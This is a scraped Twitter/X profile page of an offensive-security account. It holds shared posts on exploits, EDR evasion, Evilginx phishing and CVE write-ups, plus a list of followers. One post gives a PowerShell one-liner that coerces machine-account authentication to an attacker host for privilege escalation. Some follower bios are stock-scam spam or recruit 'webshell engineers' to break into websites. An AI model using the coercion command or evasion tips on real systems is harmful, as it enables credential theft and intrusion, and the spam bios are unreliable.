pwnspace @pwnspace
Offensive Security Engineer Earth planet Joined May 2023-
Tweets24
-
Followers40
-
Following764
-
Likes108
1 Bug, $50K+ in bounties: how Zendesk left a backdoor in hundreds of companies #bugbountytips gist.github.com/hackermondev/6…
Following up on my earlier tweet (x.com/decoder_it/sta…) regarding Kerberos relay with SMB server, I've uploaded my quick & dirty version. It's far from perfect, so feel free to improve it! github.com/decoder-it/Krb…
Following up on my earlier tweet (x.com/decoder_it/sta…) regarding Kerberos relay with SMB server, I've uploaded my quick & dirty version. It's far from perfect, so feel free to improve it! github.com/decoder-it/Krb…
Fun little IOC in impacket-smbserver's Negotiate Protocol Response 🙃
CVE-2024-34456: Trend Micro Antivirus One Dylib Injection syrion.me/CVE-2024-34456… #applesecurity #macossecurity #macosredteam
CtF hAs nOThInG tO dO wiTh AcTuAl SeCuRity ReSeArcH
@Chirag99Artani Nah Watchtowr did a real nice write up labs.watchtowr.com/palo-alto-putt…
Friendly reminder whether you’re designing malware or protecting against it, normal users don’t see computers the same way you do. I have to remind myself sometimes that a black box flickering momentarily, or a consent prompt from MOTW don’t raise the same alarms they do for us
If you, like many, think relying just on `cat` command's output is enough to be sure about the integrity of a bash file. Think twice, you could get hacked. Read below 👇
SOAPHound is out for walkies! SOAPHound is a #BloodHound collector to enumerate AD over SOAP instead of LDAP directly. Proud of Nikos for all his hard work! Blog: medium.com/falconforce/so… Tool repo: github.com/FalconForceTea… Detections: github.com/FalconForceTea…
Ok, pinvoke.dev is now live. A simple GitBook of code-generated P/Invoke signatures. Just C# for now, but I may add Rust and a few others in the future.
Our fellow BREAKDEV RED member @jackbutton_ has published the long awaited guide on how to protect your Evilginx instances ‼️ Find out how to deploy an additional Cloudflare layer in front, for extra protection! 🔥🎣 A must read for all phishermen! 🪝🐟 jackphilipbutton.com/post/how-to-pr…
Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ? Simply use: powershell iwr http://192.168.56.1 -UseDefaultCredentials To get an HTTP coerce of the machine account. 👇🧵
It was well described by @Jackson_T - basically there are 4 distinct areas when it comes to EDR evasion: - blending in - sensor avoidance - abusing blind spots - tampering sensors (including traffic manipulation) Sensor avoidance is something a lot of peeps miss. More on this:…
It was well described by @Jackson_T - basically there are 4 distinct areas when it comes to EDR evasion: - blending in - sensor avoidance - abusing blind spots - tampering sensors (including traffic manipulation) Sensor avoidance is something a lot of peeps miss. More on this:…
Did a write-up about analyzing 'SharePoint Pre-Auth Code Injection RCE chain CVE-2023-29357 & CVE-2023-24955' through a memory dump of the w3wp.exe process. I cover different debugging techniques that can be applied to other w3wp.exe dumps as well. github.com/DebugPrivilege…
My friend @waelmas01 just published his talk from BSides Cyprus 2023 where he gave one of the best live demos of a phishing attack using Evilginx, together with great explaination of all the steps how he perfected the attack. 🔥🪝🐟 Highly recommended! youtube.com/watch?v=p1opa2…
Calling all Red Teamers 🚨 Today we are introducing Tartarus-TpAllocInject, a new OPSEC-safe loader and technique for bypassing EDR solutions, by @trickster012 labs.nettitude.com/blog/creating-…
To celebrate @WyzeCam's decision to release a firmware update a day before this years Pwn2Own Toronto competition.. I've decided to release the exploit for my (killed) bugchain: github.com/blasty/unwyze .. maybe next time they will not withhold patches for critical bugs? 🙃
Easy alternative to running whoami: use an 0day to get SYSTEM
It’s very common for us to see offensive tooling enable SeDebugPrivilege so that they may bypass certain OS checks. However, what does this mean? Which OS checks are skipped? I dove into this and decided to write a blog on it. Check it out! bit.ly/3trYxdg
Jean @m_jean42
260 Followers 3K Following
EV_BatteryBets🇺�... @Baulu3327500
44 Followers 2K Following 15-30% Monthly | 2 High-Conviction Stocks.Short-Term Gains: 15-20% in Days/Weeks.DM "JOIN" for WhatsApp Alerts. Live Trade Signals • Market Analysis
FCF_Machine🇺🇸 @Gloijad45323
37 Followers 2K Following 15-30% Monthly | 2 High-Conviction Stocks.Short-Term Gains: 15-20% in Days/Weeks.DM "JOIN" for WhatsApp Alerts. Live Trade Signals • Market Analysis
Karen Chonabayashi @KChonabaya66001
5 Followers 169 Following Recruiting webshell engineers to penetrate websites, with a monthly salary of up to $100,000. If interested, please contact https://t.co/C6hUQdXgMC
Judy @l_judy14
163 Followers 3K Following
Aric Bartell @BartellAri92912
5 Followers 282 Following Hello. I'm Joey. Hope you can follow me and become friends. https://t.co/hNjphMcvdI
Alibabas @0x_alibabas
76 Followers 360 Following
Patrick @RVA4n6
666 Followers 520 Following Richmond, VA #RVA Director of Digital Forensics, writer, trainer in #dfir & Active Attack Response, former LE. Motorcycler & traveler. Opinions = my own.
JosexD j0s3 tr0y4 @JosexDDD
213 Followers 720 Following Bible reader Isaac Newton biblical views supporter. My tweets are not my employer's views. Zero day VR+XDEV: https://t.co/9hoc97AaQR
Peter Winter-Smith @peterwintrsmith
6K Followers 3K Following Security researcher & implant developer @mdseclabs; developing SAST @wsastsupport; malware, code analysis, appsec, cryptography. Trying to follow Christ.
Sochosl @Sochosl_a9x0J
68 Followers 5K Following
Valeria @valeria23kramer
317 Followers 3K Following
RaeBlack @8m6g7OxOKm7UzlU
76 Followers 7K Following
BitMindz @bitmindz
316 Followers 462 Following Innovating the latest in technology to bring the best workstations available to support the forensic and DFIR community.
Securityblog @Securityblog
12K Followers 14K Following There are 10 types of people in the world. Those who understand binary, and those who don't. All opinions and views are my own. #BsidesDub organizer
Alina @southanish79377
65 Followers 3K Following Behind every successful woman is a team of other successful women.
Wael Masri @waelmas01
377 Followers 222 Following Multidisciplinary Tech Leader | NASA Space Apps Winner | Web Summit Finals | TEDx | BSides
Marco Gesilao @GesilaoMarco
2 Followers 48 Following
Barbara @totty_barbara69
307 Followers 3K Following
Colleen @carrier1colleen
319 Followers 3K Following
Eula @eula_crittendon
267 Followers 3K Following
dub @dub_4n6
684 Followers 5K Following mobile forensics 🕵️♀️📱#DFIR #digitalforensics⚖️#imsicatcher #countersurveillance #TSCM / “soundboy” 🎛🔊1.3.1.2. 🚩🏴 🔻
Stephanie @warren10stephan
339 Followers 3K Following
Crypto Win-Win @Perciva56175103
3 Followers 75 Following Share stocks and cryptocurrencies info 🎁Daily profit sharing plan. Please click the link👉https://t.co/prafiv9PgT
Karin @karin_branch_
308 Followers 3K Following
Marilyn @medranomarilyn4
346 Followers 3K Following
0x90 Hey Eugene! @_HeyEug_
815 Followers 6K Following Il trucco, William Potter, è di non preoccuparsi che fa male.
Mary @mary98long98
548 Followers 3K Following
Gertrude @gertrudemarine8
390 Followers 3K Following
Andria @andria1thames
285 Followers 3K Following
4NC13N7C0D3X @4NC13N7C0D3X
190 Followers 3K Following
Phemt @Matteopiciarell
166 Followers 140 Following
Antonio Cuomo @antonio_cuomo
465 Followers 1K Following CTF Player (arkantolo) - Cracking Enthusiast, System and Network Security Analyst @ https://t.co/XyYazZto6G
I Know First @i_Know_First
32K Followers 28K Following Daily forecast: stock forecast, indexes, commodities and currencies based on #AI predictive algorithm. Google us: ״I Know First stock forecast״
Dark Web Intelligence @DailyDarkWeb
139K Followers 0 Following Daily Dark Web dose from the dark side.
Alibabas @0x_alibabas
76 Followers 360 Following
Smukx.E @5mukx
16K Followers 227 Following Malware Researcher & Red Teamer | 0..=n Day 🔬 at 🌒 | 0x15 Y/o
@evaristegal0is@masto... @evaristegal0is
5K Followers 498 Following 🏳️🌈🦄 don't drink and root 🦄🏳️🌈 @Pitch Security. Formerly @smallpdf @arduino. 🐘 @[email protected]
sferrini @Simone_Ferrini
5K Followers 1K Following *OS Security Researcher & Director at @prdgmshift. Passionate about RE, fuzzing, hardware and low-level binary stuff. ʚଓ
Patrick @RVA4n6
666 Followers 520 Following Richmond, VA #RVA Director of Digital Forensics, writer, trainer in #dfir & Active Attack Response, former LE. Motorcycler & traveler. Opinions = my own.
H4T4WAY @H4t4Way
423 Followers 2K Following OSCP | eWPT | CNSS | WAS C4 Warden @code4rena Lover of WebSec | SRT @SynackRedTeam #hacking #bugbounty https://t.co/w5SOQffePr… https://t.co/OvJkCLMj4M
mdowd @mdowd
32K Followers 746 Following Internet Hacker. Founder of @vigilant_labs. Previously, co-founder of Azimuth Security (now L3Harris Trenchant)
Stefan Esser @i0n1c
114K Followers 463 Following CEO of @Antid0tecom (former CEO of @SektionEins) (contact: [email protected])
Gynvael Coldwind @gynvael
38K Followers 1K Following security researcher/programmer/director @ HexArcana Cybersecurity GmbH ⁂ @pagedout_zine ⁂ @DragonSectorCTF ⁂ https://t.co/ShG2c5As1K ⁂ ex-Google ⁂ he/him
Alex Plaskett @alexjplaskett
12K Followers 572 Following Security Researcher | Pwn2Own 2018, 2021, 2022, 2024 | Posts about 0day, OS, mobile and embedded security.
Zhuowei Zhang @zhuowei
33K Followers 187 Following link in bio ⬛⬛⬛⬛⬛🟩🟩🟩🟩🟩🟩 ⬛⬛⬛⬛🟩🟩🟩🟩🟩🟩🟩🟩 ⬛⬛🟧⬛🟩🟫🟫🟫🟫🟫🟫🟩 ⬛⬛🟧⬛🟫🟫🟫🟫🟫🟫🟫🟫 ⬛⬛🟧🟧🟫🟧🟩🟧🟧🟩🟧🟫🟧 ⬛⬛🟧🟧🟫🟧🟫🟧🟧🟫🟧🟫🟧 ⬛⬛⬛🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧 ⬛⬛⬛🟩🟩🟧🟧🟫🟫🟧🟧🟩🟩 ⬛🟫🟫🟫🟫🟫🟧🟧🟧🟧🟩🟩🟫 🟫🟫🟧🟫🟫🟫🟫🟩🟩🟩🟩🟩🟧 🟫🟧🟧🟧🟫🟫🟧🟫🟫🟩🟩🟧🟧
Halvar Flake @halvarflake
44K Followers 3K Following Choose disfavour where obedience does not bring honour. I do math. And was once asked by R. Morris Sr. : "For whom?" @[email protected]
matteyeux @matteyeux
10K Followers 215 Following
George Hotz 🌑 @realGeorgeHotz
300K Followers 204 Following President @comma_ai. Founder @__tinygrad__
Filippo Roncari @f_roncari
2K Followers 590 Following Curious guy with a long-time passion for zero-days. CTO @prdgmshift, *OS security research. Prev: research director @■, co-founder and researcher @truel_it.
solst/ICE of Astarte @IceSolst
22K Followers 2K Following Pentester turned seceng turned meeting canceller - meetup https://t.co/E4rlINC0U6 - conf tracker https://t.co/tReNhuhANF
Jack @rogermoore51
483 Followers 5K Following
Neelu Tripathy @NeeluTripathy
2K Followers 447 Following Senior Security Architect | Host, Breakpoint Security Podcast | #OSCP | Ex @null0x00 Mum,BLR Chapter Lead | Opinions are my own
Joshua J. Drake @jduck
27K Followers 2K Following Securing the future through modern technology. Founder and Software Security Specialist at @magnetitesec
n0ps @n0ps3
369 Followers 668 Following Staff Mobile Security Architect at ________ 📱🦄 Trail running ⛰️🏃
Catalin Cimpanu @campuscodi
107K Followers 2K Following Parked account. I don't usually post here on a regular basis. Cybersecurity reporter. Check me out on BlueSky and Mastodon.
JosexD j0s3 tr0y4 @JosexDDD
213 Followers 720 Following Bible reader Isaac Newton biblical views supporter. My tweets are not my employer's views. Zero day VR+XDEV: https://t.co/9hoc97AaQR
kingroryg @kingroryg
457 Followers 1K Following helping make AI secure @AWSCloud, prev: @CarnegieMellon
THE PATTERNIST HISTOR... @ThePatternist
2K Followers 5K Following Historic adult warrior colouring books as well as free astrology resources https://t.co/OcMF4aRzeb
Kha1ifuzz @kha1ifuzz
4K Followers 1K Following Someone adores Information Security! Founder of https://t.co/lQ6VWRar1P and https://t.co/Jfjek6yI0F https://t.co/zrCVcrn1MJ
Hussein Muhaisen @husseinmuhaisen
2K Followers 4K Following Running security work in {stealth} // @ // PagedOut and GuidedHacking
Mathew Solnik @msolnik
3K Followers 2K Following CEO @ OffCell Research / Head of Security Engineering @ WitnessAI
James Leyte-Vidal @JamesLeyteVidal
735 Followers 2K Following SANS Principal Instructor. IT Security practitioner. GSE 209. Gamer and runner in my abundant spare time. Likely being sarcastic. FMaaS. He/Him
R. @0xrb
6K Followers 1K Following Reverse Threat Intel | Malware /Threat Hunter | Exploit Research \\ #IoT #Malware #Research, Reverse Engineering, #Botnet C2 #Hijacking
crep1x @crep1x
3K Followers 313 Following Lead cybercrime analyst, tracking adversaries activities & infrastructure, at @sekoia_io
Karan @0xDISREL
3K Followers 664 Following CTI Analyst & Malware Researcher | Staff at @vxunderground | PTC
d3d aka dead (dead, �... @deadvolvo
5K Followers 181 Following Senior Security Researcher @akamai - Malicious Group - SRT - DoD researcher of the year 2022 - Top 10 web attacks 2023 - CRTO - MSRC Top 75 in Q1/Q2 2025
Aurélien Chalot @Defte_
4K Followers 460 Following Hacker, sysadmin and security researcher @OrangeCyberdef 💻 Calisthenic enthousiast 💪 and wannabe philosopher https://t.co/SqDDhIGGGh 📖 🔥 Hide&Sec 🔥
Jenish Sojitra @_jensec
22K Followers 539 Following $2M in Bug Bounties, Web2 and AI Offensive Security research. Creator of https://t.co/Sbnrie1LXH Security @Exodus
Paul Seekamp @nullenc0de
17K Followers 608 Following I spend a significant amount of time reading security stuff. Co-Founder/Partner @CoastlineCyber https://t.co/ZQT5L8q2RO
Savan Gadhiya @gadhiyasavan
780 Followers 2K Following Technical Director at @TheSecOpsGroup. Previously worked at @NotSoSecure and @Net_Square_Trends for United States
You might like
